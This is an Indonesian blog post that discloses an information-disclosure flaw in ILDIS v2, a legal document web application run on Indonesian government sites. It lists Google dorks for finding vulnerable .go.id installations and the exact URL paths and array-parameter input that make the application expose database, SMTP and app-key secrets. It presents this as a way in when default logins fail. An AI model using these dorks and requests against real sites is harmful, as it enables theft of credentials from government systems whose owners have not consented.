-
Hai sobat
Saya ikal,
Disini saya akan sharing - sharing nih.
-
Disini saya akan mempublish vulnerability di WebApp ildis v2. Kalau kemarin kita bahas yang v1,sekarang kita bahas yang v2 yah.
Vulnerability ILDIS v1 :
https://www.draxploit.web.id/2021/01/ildis-unauthenticated-sql-injection-and.html
Berbeda dengan ILDIS v1 yang memiliki tampilan lebih simple dan elegan, di ILDIS v2 ini lebih ramai tampilan indexnya, dan agak kurang mobile friendly (cacat saat ditampilkan di HandPhone).
Okeh langsung saja, untuk information disclosurenya lumayan berguna jika kita tidak dapat login melalui Default username/passwordnya :D, karena kita bisa disuguhkan db,smtp,appkey,pathroot.
- Dork : "ILDIS" site:go.id
inurl:?tipe_dokumen= site:go.id
inurl:/data_dokumen site:go.id
1.Information Disclosure.
Letak bugnya di
https://localhost/pencarian/HaikalGanteng/detail
https://localhost/[path]/pencarian/HaikalGanteng/detail
https://localhost/pencarian?q[]=A
https://localhost/[path]/pencarian?q[]=A